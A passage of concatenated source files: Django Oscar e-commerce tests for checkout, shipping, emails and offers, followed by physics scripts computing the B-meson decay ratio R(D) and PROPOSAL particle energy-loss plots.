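#                        'max_length': 32, 'label': _('Fax number')},
#     }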
```
#### File: functional/checkout/test_session.py
```python
from django.urls import reverse
from oscar.test import testcases
from . import CheckoutMixin
class TestCheckoutOfDigitalGoods(CheckoutMixin, testcases.WebTestCase):
def setUp(self):
super().setUp()
product = self.create_digital_product()
self.add_product_to_basket(product)
def test_buying_a_digital_good_doesnt_error(self):
payment_details_page = self.get(
reverse('checkout:index')).maybe_follow()
preview_page = payment_details_page.click(linkid="view_preview")
response = preview_page.forms['place_order_form'].submit().follow()
self.assertIsOk(response)
```
#### File: functional/dashboard/test_shipping.py
```python
from decimal import Decimal as D
from django.urls import reverse
from oscar.apps.shipping import models
from oscar.test.testcases import WebTestCase
class TestShippingMethodDashboard(WebTestCase):
is_staff = True
def test_for_smoke(self):
list_page = self.get(reverse('dashboard:shipping-method-list'))
# Create a shipping method
create_page = list_page.click(linkid="create_new_shipping_method")
create_page.form['name'] = 'My method'
detail_page = create_page.form.submit().follow()
self.assertInContext(detail_page, 'method')
self.assertEqual(1, models.WeightBased.objects.all().count())
method = models.WeightBased.objects.all()[0]
# Edit shipping method
edit_page = detail_page.click(linkid="edit_method")
edit_page.form['name'] = 'My new method'
reloaded_detail_page = edit_page.form.submit().follow()
reloaded_method = models.WeightBased.objects.get(
id=method.id)
self.assertEqual("My new method", reloaded_method.name)
# Add a weight band
reloaded_detail_page.form['upper_limit'] = '0.1'
reloaded_detail_page.form['charge'] = '2.99'
reloaded_detail_page = reloaded_detail_page.form.submit().follow()
self.assertEqual(1, method.bands.all().count())
band = method.bands.all()[0]
# Edit weight band
edit_band_page = reloaded_detail_page.click(
linkid="edit_band_%s" % band.id)
edit_band_page.form['charge'] = '3.99'
reloaded_detail_page = edit_band_page.form.submit().follow()
reloaded_band = method.bands.get(id=band.id)
self.assertEqual(D('3.99'), reloaded_band.charge)
# Delete weight band
delete_band_page = reloaded_detail_page.click(
linkid="delete_band_%s" % reloaded_band.id)
reloaded_detail_page = delete_band_page.form.submit().follow()
self.assertEqual(0, method.bands.all().count())
# Delete shipping method
delete_page = reloaded_detail_page.click(linkid="delete_method")
delete_page.form.submit().follow()
self.assertEqual(0, models.WeightBased.objects.all().count())
```
#### File: functional/order/test_emails.py
```python
import os
from django.core import mail
from django.test import TestCase
from oscar.core.loading import get_class
from oscar.test.factories import ProductImageFactory, create_order
from oscar.test.utils import EmailsMixin, remove_image_folders
OrderDispatcher = get_class('order.utils', 'OrderDispatcher')
class TestConcreteEmailsSending(EmailsMixin, TestCase):
def setUp(self):
super().setUp()
self.dispatcher = OrderDispatcher()
def test_send_order_placed_email_for_user(self):
order_number = 'SOME-NUM00042'
order = create_order(number=order_number, user=self.user)
extra_context = {
'order': order,
'lines': order.lines.all()
}
self.dispatcher.send_order_placed_email_for_user(order, extra_context)
self._test_common_part()
expected_subject = 'Confirmation of order {}'.format(order_number)
assert expected_subject == mail.outbox[0].subject
assert 'Your order contains:' in mail.outbox[0].body
product_title = order.lines.first().title
assert product_title in mail.outbox[0].body
def test_send_order_placed_email_with_attachments_for_user(self):
remove_image_folders()
order_number = 'SOME-NUM00042'
order = create_order(number=order_number, user=self.user)
extra_context = {
'order': order,
'lines': order.lines.all()
}
line = order.lines.first()
product_image = ProductImageFactory(product=line.product)
attachments = [
['fake_file.html', b'file_content', 'text/html'],
['fake_image.png', b'file_content', 'image/png'],
product_image.original.path, # To test sending file from `FileField` based field
]
self.dispatcher.send_order_placed_email_for_user(order, extra_context, attachments)
# All attachments were sent with email
assert len(mail.outbox[0].attachments) == 3
expected_attachments = ['fake_file.html', 'fake_image.png', 'test_image.jpg']
assert [attachment[0] for attachment in mail.outbox[0].attachments] == expected_attachments
# Remove test file
os.remove(product_image.original.path)
```
#### File: integration/address/test_forms.py
```python
from django.test import TestCase
from oscar.apps.address import forms, models
from oscar.test.factories import UserFactory
class TestUserAddressForm(TestCase):
def setUp(self):
self.user = UserFactory()
self.country = models.Country.objects.create(
iso_3166_1_a2='GB', name="UNITED KINGDOM")
def test_merges_addresses_with_same_hash(self):
data = {
'user': self.user,
'first_name': "Matus",
'last_name': "Moravcik",
'line1': "1 Egg Street",
'line4': "London",
'postcode': "N12 9RE",
'country': self.country}
# Create two addresses, which are slightly different
models.UserAddress.objects.create(**data)
other = data.copy()
other['first_name'] = 'Izidor'
duplicate = models.UserAddress.objects.create(**other)
# Edit duplicate to be same as original and check that the two
# addresses are merged when the form saves.
post_data = data.copy()
post_data['country'] = self.country.iso_3166_1_a2
form = forms.UserAddressForm(self.user, post_data, instance=duplicate)
self.assertFalse(form.is_valid())
self.assertTrue(len(form.errors['__all__']) > 0)
```
#### File: integration/communication/test_notification.py
```python
from django.test import TestCase
from oscar.apps.communication.models import Notification
from oscar.core.compat import get_user_model
from oscar.core.loading import get_class
from oscar.test.factories import UserFactory
User = get_user_model()
Dispatcher = get_class('communication.utils', 'Dispatcher')
class TestANewNotification(TestCase):
def setUp(self):
self.notification = Notification(
recipient=UserFactory(),
subject="Hello")
def test_is_in_a_users_inbox(self):
assert Notification.INBOX == self.notification.location
def test_is_not_read(self):
assert not self.notification.is_read
class TestANotification(TestCase):
def setUp(self):
self.notification = Notification.objects.create(
recipient=UserFactory(),
subject="Hello")
def test_can_be_archived(self):
self.notification.archive()
assert Notification.ARCHIVE == self.notification.location
class NotificationServiceTestCase(TestCase):
def test_notify_a_single_user(self):
user = UserFactory()
subj = "Hello you!"
body = "This is the notification body."
Dispatcher().notify_user(user, subj, body=body)
user_notification = Notification.objects.get(recipient=user)
assert user_notification.subject == subj
assert user_notification.body == body
def test_notify_a_set_of_users(self):
users = UserFactory.create_batch(3)
subj = "Hello everyone!"
body = "This is the notification body."
Dispatcher().notify_users(User.objects.all(), subj, body=body)
for user in users:
user_notification = Notification.objects.get(recipient=user)
assert user_notification.subject == subj
assert user_notification.body == body
```
#### File: integration/core/test_prices.py
```python
from decimal import Decimal as D
from itertools import product
from django.test import TestCase
from oscar.core.prices import Price
class TestPriceObject(TestCase):
def test_can_be_instantiated_with_tax_amount(self):
price = Price('USD', D('10.00'), tax=D('2.00'))
self.assertTrue(price.is_tax_known)
self.assertEqual(D('12.00'), price.incl_tax)
def test_can_have_tax_set_later(self):
price = Price('USD', D('10.00'))
price.tax = D('2.00')
self.assertEqual(D('12.00'), price.incl_tax)
def test_price_equals_reflexivity(self):
for price in (
Price(currency='USD', excl_tax=D('10.00')),
Price(currency='USD', excl_tax=D('10.00'), tax=D('2.00')),
Price(currency='USD', excl_tax=D('10.00'), incl_tax=D('12.00')),
):
self.assertEqual(price, price)
def test_price_equals_formats(self):
price1 = Price(currency='USD', excl_tax=D('10.00'), tax=D('2.00'))
price2 = Price(currency='USD', excl_tax=D('10.00'), incl_tax=D('12.00'))
self.assertEqual(price1, price2)
def test_price_equals_currency_matters(self):
price1 = Price(currency='EUR', excl_tax=D('10.00'), tax=D('2.00'))
price2 = Price(currency='USD', excl_tax=D('10.00'), tax=D('2.00'))
self.assertNotEqual(price1, price2)
def test_price_equals_transitivity(self):
prices = (
Price(currency='EUR', excl_tax=D('10.00'), tax=D('2.00')),
Price(currency='USD', excl_tax=D('10.00'), tax=D('2.00')),
Price(currency='USD', excl_tax=D('10.00'), incl_tax=D('12.00')),
Price(currency='USD', excl_tax=D('10.00'), tax=D('8.00'))
)
prices_product = product(prices, prices)
for price1, price2 in prices_product:
self.assertEqual(price1 == price2, price2 == price1)
```
#### File: catalogue/migrations/0019_option_required.py
```python
from django.db import migrations, models
def migrate_product_options(apps, schema_editor):
"""
Migrate product Option.type field to required
Set Option.type='text'
"""
Option = apps.get_model('catalogue', 'Option')
for option in Option.objects.all():
if option.type == "Required":
option.required = True
option.type = 'text'
option.save()
class Migration(migrations.Migration):
dependencies = [
('catalogue', '0018_auto_20191220_0920'),
]
operations = [
migrations.AddField(
model_name='option',
name='required',
field=models.BooleanField(default=False, verbose_name='Is option required?'),
),
migrations.RunPython(migrate_product_options, migrations.RunPython.noop),
migrations.AlterField(
model_name='option',
name='type',
field=models.CharField(choices=[('text', 'Text'), ('integer', 'Integer'), ('boolean', 'True / False'), ('float', 'Float'), ('date', 'Date')], default='text', max_length=255, verbose_name='Type'),
),
]
```
#### File: unit/basket/test_offers.py
```python
from decimal import ROUND_HALF_UP
from decimal import Decimal as D
from django.conf import settings
from django.test import RequestFactory, TestCase
from django.urls import reverse
from oscar.core.loading import get_class, get_classes, get_model
from oscar.test.factories import UserFactory
Basket = get_model("basket", "Basket")
Product = get_model("catalogue", "Product")
factory = RequestFactory()
Applicator = get_class("offer.applicator", "Applicator")
Selector, UK = get_classes("partner.strategy", ["Selector", "UK"])
class UKSelector(Selector):
def strategy(self, request=None, user=None, **kwargs):
return UK(request)
def money(amount):
return amount.quantize(D("0.01"), ROUND_HALF_UP)
def get_user_basket(user, request):
editable_baskets = Basket.objects.filter(status__in=["Open", "Saved"])
basket, __ = editable_baskets.get_or_create(owner=user)
basket.strategy = UKSelector().strategy(request=request, user=user)
basket.reset_offer_applications()
if not basket.is_empty:
Applicator().apply(basket, user, request)
request.session[settings.OSCAR_BASKET_COOKIE_OPEN] = basket.pk
request.session.save()
return basket
class OfferTest(TestCase):
fixtures = ["catalogue", "offer"]
def check_general_truths(self, basket):
inverse_tax_multiplier = D(1) / (D(1) + UK.rate)
calculated_total_excl_tax = money(
inverse_tax_multiplier * basket.total_incl_tax
)
self.assertEqual(
calculated_total_excl_tax,
basket.total_excl_tax,
"The total price without tax should conform to the standard "
"formula for calculating tax (as a percentage)",
)
self.assertAlmostEqual(
basket.total_excl_tax_excl_discounts / basket.total_incl_tax_excl_discounts,
basket.total_excl_tax / basket.total_incl_tax,
4,
"The ratio of price with tax and without tax should be the same for the "
"price with and without discounts. If that is not the case people would "
"be able to change the tax they must pay by gaming the discount.",
)
self.assertNotAlmostEqual(
basket.total_excl_tax_excl_discounts - basket.total_excl_tax,
basket.total_incl_tax_excl_discounts - basket.total_incl_tax,
2,
"The discount over the total excluding tax can never be the same as "
"the discount over the total including tax. Otherwise our tax rate"
"would not be linear over the amount.",
)
self.assertEqual(
basket.total_excl_tax + basket.total_tax,
basket.total_incl_tax,
"The tax summation should amount to the total_incl_tax"
)
def test_offer_incl_tax(self):
"The offer should be calculated as if it was declared including tax"
with self.settings(OSCAR_OFFERS_INCL_TAX=True):
self.assertEqual(Basket.objects.count(), 0)
admin = UserFactory()
self.client.force_login(admin)
# throw an item in the basket
basket_add_url = reverse("basket:add", args=(2,))
body = {"quantity": 1}
response = self.client.post(basket_add_url, body)
# throw another item in the basket so the offer activates
basket_add_url = reverse("basket:add", args=(3,))
body = {"quantity": 2}
response = self.client.post(basket_add_url, body)
request = factory.post(basket_add_url, body)
request.user = admin
request.session = self.client.session
basket = get_user_basket(admin, request)
self.assertEqual(response.status_code, 302)
self.assertEqual(Basket.objects.count(), 1)
# now go and check if the offer was applied correctly
self.assertEqual(
basket.total_incl_tax_excl_discounts - basket.total_incl_tax,
D("10.00"),
"The offer should be a flat 10 pound discount on the total "
"including tax",
)
self.assertEqual(
basket.total_discount,
D("10.00"),
"The total discount property should properly reflect the discount"
"applied.",
)
self.check_general_truths(basket)
def test_offer_excl_tax(self):
"The offer should be calculated as if it was declared excluding tax"
with self.settings(OSCAR_OFFERS_INCL_TAX=False):
self.assertEqual(Basket.objects.count(), 0)
admin = UserFactory()
self.client.force_login(admin)
# throw an item in the basket
basket_add_url = reverse("basket:add", args=(2,))
body = {"quantity": 1}
response = self.client.post(basket_add_url, body)
# throw another item in the basket so the offer activates
basket_add_url = reverse("basket:add", args=(3,))
body = {"quantity": 2}
response = self.client.post(basket_add_url, body)
            # now go and check if that offer was handled correctly
request = factory.post(basket_add_url, body)
request.user = admin
request.session = self.client.session
basket = get_user_basket(admin, request)
self.assertEqual(response.status_code, 302)
self.assertEqual(Basket.objects.count(), 1)
# now go and check if the offer was applied correctly
self.assertEqual(
basket.total_excl_tax_excl_discounts - basket.total_excl_tax,
D("10.00"),
"The offer should be a flat 10 pound discount on the total "
"excluding tax",
)
self.assertEqual(
basket.total_discount,
D("10.00"),
"The total discount property should properly reflect the discount"
"applied.",
)
self.check_general_truths(basket)
```
|
{
"source": "Jean1995/Bachelorarbeit",
"score": 2
}
|
#### File: Bachelorarbeit/pycode/R.py
```python
import fit2
from scipy.integrate import quad
import numpy as np
from numpy.linalg import inv
import scipy.constants as const
from numpy import random
from table import (
make_SI,
write,
make_table,
)
from uncertainties import ufloat
from fit2 import N1, N2, m_p, m_0, m_b, m_d, m_e, m_tau, m_mu, m_bottom, m_charm, V_cb, R_exp, m_p_s, m_0_s, m_b_s, m_d_s, m_e_s, m_tau_s, m_mu_s, m_bottom_s, m_charm_s, V_cb_s, R_exp_s
from params import eta, G_f, plot_difwq, R_exp, R_exp_s
a_mc = fit2.a_mc
m_mc = fit2.m_mc
import matplotlib.pyplot as plt
plt.style.use('ggplot')
plt.set_cmap('Set2')
plt.rcParams['figure.figsize'] = (10, 8)
plt.rcParams['font.size'] = 20
plt.rcParams['lines.linewidth'] = 1.5
plt.rcParams['text.usetex'] = True
plt.rcParams['axes.formatter.use_locale'] = True  # decimal commas (German locale)
plt.rcParams['text.latex.preamble'] = ['\\usepackage[locale=DE,separate-uncertainty=true,per-mode=symbol-or-fraction,]{siunitx} \\DeclareMathSymbol{,}{\mathord}{letters}{"3B}']
plt.rc('font',family='Latin Modern')
### Functions
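# The form-factor expansion below works in the conformal variable
#   z(w) = (sqrt(w + 1) - sqrt(2)) / (sqrt(w + 1) + sqrt(2)),
#   w    = (m_b^2 + m_d^2 - q^2) / (2 m_b m_d),
# which maps the physical region 0 <= q^2 <= (m_b - m_d)^2 onto a small
# interval around z = 0 (comments added for clarity).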
def z(w):
return (np.sqrt(w+1) - np.sqrt(2)) / (np.sqrt(w+1) + np.sqrt(2))
def qq(z):
return m_b**2 + m_d**2 - 2*m_b*m_d * (z**2 + 6*z + 1)/(z-1)**2
def z_from_qq(qq):
w = (m_b**2 + m_d**2 - qq)/(2*m_b*m_d)
return z(w)
def f(z,n,m):
return z**n/(1 - qq(z)/m**2)
z_max = z_from_qq(0)
def f_p(z, a, m_p_tmp):
'''
    Note: the parameter order is (a_+0, a_+1, a_+2, ..., a_+N-1, a_00, a_01, a_02, ..., a_0N-1)
'''
tmp = 0
for n in range(N1):
tmp = tmp + a[n] * f(z, n, m_p_tmp)
return tmp
def f_0(z, a, m_0_tmp):
    '''Expansion of the scalar form factor f_0, using coefficients a[N1:N1+N2].'''
tmp = 0
for n in range(N2):
tmp = tmp + a[n+N1] * f(z, n, m_0_tmp)
return tmp
def dif_wq(qq, m_l, a, m_b_tmp, m_d_tmp, m_p_tmp, m_0_tmp):
    # note the cancelled prefactors: (eta^2 G_f^2 V_cb m_b)/(192 pi^3)
r = m_d_tmp/m_b_tmp
lambd = (qq - m_b_tmp**2 - m_d_tmp**2)**2 - 4*m_b_tmp**2*m_d_tmp**2
c_plus = lambd/m_b_tmp**4 * (1 + m_l**2/(2*qq))
c_null = (1-r**2)**2 * 3*m_l**2/(2*qq)
return np.sqrt(lambd) * (1 - m_l**2/qq)**2 * (c_plus * f_p(z_from_qq(qq), a, m_p_tmp)**2 + c_null * f_0(z_from_qq(qq), a, m_0_tmp)**2 )
def dif_wq_complete(qq, m_l, a, m_b_tmp, m_d_tmp, V_cb_tmp, m_p_tmp, m_0_tmp):
r = m_d_tmp/m_b_tmp
lambd = (qq - m_b_tmp**2 - m_d_tmp**2)**2 - 4*m_b_tmp**2*m_d_tmp**2
c_plus = lambd/m_b_tmp**4 * (1 + m_l**2/(2*qq))
c_null = (1-r**2)**2 * 3*m_l**2/(2*qq)
vorfaktor = eta**2 * G_f**2 * V_cb_tmp**2 * m_b_tmp * np.sqrt(lambd) * 1/(192*np.pi**3) * (1 - m_l**2 / qq)**2
return vorfaktor * (c_plus * f_p(z_from_qq(qq), a, m_p_tmp)**2 + c_null * f_0(z_from_qq(qq), a, m_0_tmp)**2 )
###
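# The observable computed below (comment added for clarity):
#   R(D) = Gamma(B -> D tau nu) / Gamma(B -> D l nu),  l = e, mu averaged,
# evaluated per Monte Carlo sample as 2 * Gamma_tau / (Gamma_e + Gamma_mu),
# where each Gamma integrates dif_wq from m_l**2 up to (m_b - m_d)**2.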
R_values = np.array([])  # empty array for the sampled values
for a, m in zip(a_mc, m_mc):
tot_wq_e = quad(dif_wq, m[4]**2, (m[2]-m[3])**2, args=(m[4], a, m[2], m[3], m[0], m[1]))[0]
tot_wq_tau = quad(dif_wq, m[5]**2, (m[2]-m[3])**2, args=(m[5], a, m[2], m[3], m[0], m[1]))[0]
tot_wq_mu = quad(dif_wq, m[6]**2, (m[2]-m[3])**2, args=(m[6], a, m[2], m[3], m[0], m[1]))[0]
#print(tot_wq_e)
R_values = np.append(R_values, 2*tot_wq_tau/(tot_wq_e + tot_wq_mu))
R_error = np.std(R_values)
R_mean = np.mean(R_values)
write('R_si' + str(N1) + str(N2) + '.tex', make_SI(ufloat(R_mean,R_error), r'', figures=2))
print("R =",R_mean, "+-", R_error)
if N1==3 and N2==3: # ugly workaround
write('R_' + str(N1) + str(N2) + '.tex', make_table([[ufloat(R_mean, R_error)]], [2]))
else:
write('R_' + str(N1) + str(N2) + '.tex', make_table([[ufloat(R_mean, R_error)]], [1]))
# deviation of R_mean from R_exp
write('R_abweichung_' + str(N1) + str(N2) +'.tex', make_SI(abs(R_exp - R_mean)/R_exp_s, r'', figures=1))
# R-tilde: integrate only from m_tau**2 up to (m_b-m_d)**2, to remedy the growing errors of the dif. decay width
#R_values_schlange = np.array([])
#
#for a, m in zip(a_mc, m_mc):
# tot_wq_e_schlange = quad(dif_wq, m[5]**2, (m[2]-m[3])**2, args=(m[4], a, m[2], m[3], m[0], m[1]))[0]
# tot_wq_tau_schlange = quad(dif_wq, m[5]**2, (m[2]-m[3])**2, args=(m[5], a, m[2], m[3], m[0], m[1]))[0]
# tot_wq_mu_schlange = quad(dif_wq, m[5]**2, (m[2]-m[3])**2, args=(m[6], a, m[2], m[3], m[0], m[1]))[0]
# #print(tot_wq_e)
# R_values_schlange = np.append(R_values_schlange, 2*tot_wq_tau_schlange/(tot_wq_e_schlange + tot_wq_mu_schlange))
#
#R_error_schlange = np.std(R_values_schlange)
#R_mean_schlange = np.mean(R_values_schlange)
#
#print("R~", R_mean_schlange, "+-", R_error_schlange)
#write('Rschlange_si' + str(N1) + str(N2) + '.tex', make_SI(ufloat(R_mean_schlange,R_error_schlange), r'', figures=2))
#write('Rschlange_' + str(N1) + str(N2) + '.tex', make_table([[ufloat(R_mean_schlange, R_error_schlange)]], [1]))
#
#### Differential cross section: electrons / tauons
#
if plot_difwq != 0:
qq_plot_tau = np.linspace(m_tau**2, (m_b-m_d)**2 , 300)
qq_plot_e = np.linspace(m_e**2, (m_b-m_d)**2 , 300)
qq_plot_mu = np.linspace(m_mu**2, (m_b-m_d)**2 , 300)
dif_wq_val_e = np.array([])
dif_wq_val_e_up = np.array([])
dif_wq_val_e_down = np.array([])
dif_wq_val_tau = np.array([])
dif_wq_val_tau_up = np.array([])
dif_wq_val_tau_down = np.array([])
dif_wq_val_mu = np.array([])
dif_wq_val_mu_up = np.array([])
dif_wq_val_mu_down = np.array([])
for qq_tmp in qq_plot_e:
tmp_e = np.array([])
for a, m in zip(a_mc, m_mc):
tmp_e = np.append(tmp_e, dif_wq_complete(qq_tmp, m[4], a, m[2], m[3], m[9], m[0], m[1]))
tmp_mean_e = np.mean(tmp_e)
tmp_std_e = np.std(tmp_e)
dif_wq_val_e = np.append(dif_wq_val_e, tmp_mean_e)
dif_wq_val_e_up = np.append(dif_wq_val_e_up, tmp_mean_e + tmp_std_e)
dif_wq_val_e_down = np.append(dif_wq_val_e_down, tmp_mean_e - tmp_std_e)
for qq_tmp in qq_plot_tau:
tmp_tau = np.array([])
for a, m in zip(a_mc,m_mc):
tmp_tau = np.append(tmp_tau, dif_wq_complete(qq_tmp, m[5], a, m[2], m[3], m[9], m[0], m[1]))
tmp_mean_tau = np.mean(tmp_tau)
tmp_std_tau = np.std(tmp_tau)
dif_wq_val_tau = np.append(dif_wq_val_tau, tmp_mean_tau)
dif_wq_val_tau_up = np.append(dif_wq_val_tau_up, tmp_mean_tau + tmp_std_tau)
dif_wq_val_tau_down = np.append(dif_wq_val_tau_down, tmp_mean_tau - tmp_std_tau)
for qq_tmp in qq_plot_mu:
tmp_mu = np.array([])
for a, m in zip(a_mc, m_mc):
tmp_mu = np.append(tmp_mu, dif_wq_complete(qq_tmp, m[6], a, m[2], m[3], m[9], m[0], m[1]))
tmp_mean_mu = np.mean(tmp_mu)
tmp_std_mu = np.std(tmp_mu)
dif_wq_val_mu = np.append(dif_wq_val_mu, tmp_mean_mu)
dif_wq_val_mu_up = np.append(dif_wq_val_mu_up, tmp_mean_mu + tmp_std_mu)
dif_wq_val_mu_down = np.append(dif_wq_val_mu_down, tmp_mean_mu - tmp_std_mu)
red = 1/(10**(-15) )#* 10**9 * const.eV)
plt.plot(z_from_qq(qq_plot_e) ,dif_wq_val_e*red, label=r'Dif. Zerfallsbreite, $l = e$', color='b')
plt.fill_between(z_from_qq(qq_plot_e), dif_wq_val_e_up*red, dif_wq_val_e_down*red, interpolate=True, alpha=0.3, color='b',linewidth=0.0)
plt.plot(z_from_qq(qq_plot_tau) ,dif_wq_val_tau*red, label=r'Dif. Zerfallsbreite, $l = \tau$', color='r')
plt.fill_between(z_from_qq(qq_plot_tau), dif_wq_val_tau_up*red, dif_wq_val_tau_down*red, interpolate=True, alpha=0.3, color='r',linewidth=0.0)
plt.plot(z_from_qq(qq_plot_mu) ,dif_wq_val_mu*red, label=r'Dif. Zerfallsbreite, $l = \mu$', color='g')
plt.fill_between(z_from_qq(qq_plot_mu), dif_wq_val_mu_up*red, dif_wq_val_mu_down*red, interpolate=True, alpha=0.3, color='g',linewidth=0.0)
plt.ylabel(r'$\frac{\mathrm{d} \Gamma}{\mathrm{d} q^2} \left(\overline{B} \to D l \overline{\nu}_l \right) \,/\, \left( \num{e-15} \si{\giga \electronvolt\tothe{-1}} \right)$')
plt.xlabel(r'$z$')
plt.legend(loc='best', prop={'size':20})
plt.tight_layout()
plt.savefig('plot_diff_wq' + str(N1) + str(N2) + '.pdf') #fancy
plt.clf()
np.savetxt('difwqges_'+str(N1)+str(N2)+'.txt', np.column_stack([dif_wq_val_e, dif_wq_val_tau, dif_wq_val_mu]))
```
|
{
"source": "Jean1995/Masterarbeit",
"score": 2
}
|
#### File: Masterarbeit/Plots/dEdx_ionization.py
```python
import pyPROPOSAL as pp
import pyPROPOSAL.parametrization as parametrization
import matplotlibconfig as conf
try:
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
except ImportError:
raise ImportError("Matplotlib not installed!")
try:
import numpy as np
except ImportError:
raise ImportError(
"Numpy not installed! Needed to calculate the detector cylinder"
)
import math
if __name__ == "__main__":
electron = pp.particle.EMinusDef.get()
positron = pp.particle.EPlusDef.get()
medium = pp.medium.Air(1.0) # With densitiy correction
cuts = pp.EnergyCutSettings(-1, -1) # ecut, vcut
dEdx_list = []
energy = np.logspace(-1, 12, 1000)
energy = energy[energy > 0.52]
interpolation_def = pp.InterpolationDef()
# =========================================================
# Constructor args for parametrizations
#
# - particle
# - medium
# - cut
# - multiplier
# - lpm effect
# - interpolation definition
# =========================================================
param_defs_electron = [electron, medium, cuts, 1.]
    param_defs_positron = [positron, medium, cuts, 1.]
params = [
pp.parametrization.ionization.BetheBlochRossi(*param_defs_electron),
pp.parametrization.ionization.BetheBlochRossiLO(*param_defs_electron),
pp.parametrization.ionization.BergerSeltzerMoller(*param_defs_electron),
pp.parametrization.ionization.BergerSeltzerBhabha(*param_defs_positron)
]
# =========================================================
# Create x sections out of their parametrizations
# =========================================================
crosssections = []
crosssections.append(pp.crosssection.IonizIntegral(
params[0]
))
crosssections.append(pp.crosssection.IonizIntegral(
params[1]
))
crosssections.append(pp.crosssection.IonizIntegral(
params[2]
))
crosssections.append(pp.crosssection.IonizIntegral(
params[3]
))
# =========================================================
# Calculate DE/dx at the given energies
# =========================================================
for cross in crosssections:
dEdx = []
for E in energy:
dEdx.append(cross.calculate_dEdx(E))
dEdx_list.append(dEdx)
# =========================================================
# Plot
# =========================================================
plt.rcParams.update(conf.params)
fig = plt.figure(figsize=(conf.width,4))
gs = mpl.gridspec.GridSpec(2, 1, height_ratios=[4, 3], hspace=0.05)
ax = fig.add_subplot(gs[0])
labels = [r'Bethe with NLO correction', r'Bethe without NLO correction', r'Berger-Seltzer (M{\o}ller)', r'Berger-Seltzer (Bhabha)']
colors = ['green', 'red', 'blue', 'orange']
for dEdx, param, _label, _color in zip(dEdx_list, params, labels, colors):
ax.semilogx(
energy,
dEdx,
linestyle='-',
label=_label,
color = _color
)
ax.set_ylabel(r'$\left\langle\frac{\mathrm{d}E}{\mathrm{d}X}\right\rangle \,\left/\, \left( \rm{MeV} \cdot \rm{g}^{-1} \rm{cm}^2 \right) \right. $')
ax.xaxis.grid(conf.grid_conf)
ax.yaxis.grid(conf.grid_conf)
#ax.set_yscale('log')
ax.legend(loc='best')
plt.setp(ax.get_xticklabels(), visible=False)
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom=False
) # labels along the bottom edge are off
# ====[ ratio ]============================================
ax = fig.add_subplot(gs[1], sharex=ax)
start = 0
ax.semilogx(
energy[start:],
np.array(dEdx_list)[2][start:] / np.array(dEdx_list[1][start:]),
linestyle='-',
label=r'Berger-Seltzer (M{\o}ller) / Bethe',
color = colors[2]
)
ax.semilogx(
energy[start:],
np.array(dEdx_list)[3][start:] / np.array(dEdx_list[1][start:]),
linestyle='-',
label=r'Berger-Seltzer (Bhabha) / Bethe',
color = colors[3]
)
ax.xaxis.grid(conf.grid_conf)
ax.yaxis.grid(conf.grid_conf)
ax.legend(loc='best')
ax.set_xlabel(r'$E$ / MeV')
ax.set_ylabel(r'Ratio')
plt.tight_layout()
fig.savefig('build/dEdx_ionization.pdf',bbox_inches='tight')
plt.show()
```
#### File: Masterarbeit/Plots/mupair_rho.py
```python
import numpy as np
import pyPROPOSAL as pp
import pyPROPOSAL.parametrization as parametrization
from matplotlibconfig import *
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
#define defaults and parametrization
mu = pp.particle.MuMinusDef.get()
medium = pp.medium.Ice(1.0)
cuts = pp.EnergyCutSettings(-1, -1)
interpolation_def = pp.InterpolationDef()
param_defs_mupair = [mu, medium, cuts, 1.0, True, interpolation_def]
plt.rcParams.update(params)
plt.figure(figsize=(width, 3.5))
pp.RandomGenerator.get().set_seed(1234)
param = parametrization.mupairproduction.KelnerKokoulinPetrukhinInterpolant(*param_defs_mupair)
v_list = [0.1, 0.5, 0.8]
colors = ['tab:blue', 'tab:orange', 'tab:green']
E_list = [1e4, 1e9]
linestyles = ['--', '-']
statistics = int(1e6)
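# rho is the energy asymmetry of the produced muon pair,
#   rho = (E_plus - E_minus) / (E_plus + E_minus),
# sampled below for fixed relative energy loss v (definition assumed from the
# standard Kelner-Kokoulin-Petrukhin parametrization).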
for E_init, linestyle in zip(E_list, linestyles):
rho_list = []
energies = np.ones(statistics)*E_init
for i, v in enumerate(v_list):
rho_list.append([])
for E in energies:
rho_list[i].append(param.Calculaterho(E, v, np.random.rand(), np.random.rand()))
for i, (v, c) in enumerate(zip(v_list, colors)):
plt.hist(np.abs(rho_list[i]), color=c, bins=40, histtype='step', zorder=3, ls=linestyle)
plt.xlabel(r'$\lvert \rho \rvert$')
plt.ylabel(r'Frequency')
# build a custom legend with one entry per asymmetry value v
custom_lines = []
legends = []
for v, c in zip(v_list, colors):
    custom_lines.append(Line2D([0], [0], color=c, lw=2))
    legends.append(r'$v = {:.2g}$'.format(v))
plt.legend(custom_lines, legends, loc='upper left')
plt.grid(grid_conf)
plt.tight_layout()
plt.savefig('build/mupair_rho.pdf',bbox_inches='tight')
```
#### File: Masterarbeit/Plots/spectrum_mupair.py
```python
from __future__ import division
import sys
import os
import pyPROPOSAL as pp
import math
import time
import datetime
from matplotlibconfig import *
try:
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
from matplotlib.colors import LogNorm
from matplotlib.ticker import AutoMinorLocator
from mpl_toolkits.axes_grid1 import make_axes_locatable
except ImportError:
print("Matplotlib not installed!")
try:
import numpy as np
except ImportError:
print("Numpy not installed!")
try:
from sklearn.utils import check_random_state
except ImportError:
print("SkLearn not installed!")
class ProgressBar(object):
def __init__(self, loops, bar_lenght=50, start=0, **keywords):
self._bar_lenght = bar_lenght
self._bar = []
self._loops = loops
self._start = float(start)
self._current_loop = start
self._started_process = False
self._start_time = None
self._pacman = False
self._status = ""
self._text = "\rPercent: [{0}] {1}% Time: {2} Iteration: {3}/{4} {5}"
self._bar_full = "="
self._bar_empty = " "
for key, value in keywords.items():
if key is "pacman":
assert type(value) is bool
self._pacman = value
if self._pacman:
self._bar_full = "-"
self._bar_empty = "o"
current = self._bar_empty
for i in range(self._bar_lenght):
                        if current == self._bar_empty:
current = " "
self._bar.append(current)
else:
current = self._bar_empty
self._bar.append(current)
else:
for i in range(self._bar_lenght):
self._bar.append(self._bar_empty)
self._current_pac_state = "C"
self._current_pac_block = 0
def reset(self):
self._current_loop = self._start
self._status = ""
self._started_process = False
def start(self):
self._started_process = True
self._start_time = time.time()
def update(self):
if self._started_process is False:
print("Pleas start ProgressBar before updating it!")
return
self._current_loop += 1.0
progress = self._current_loop / self._loops
if progress >= 1.0:
self._status = "Done...\n"
if self._pacman:
block = int((self._bar_lenght - 1) * progress)
if self._current_pac_block < block:
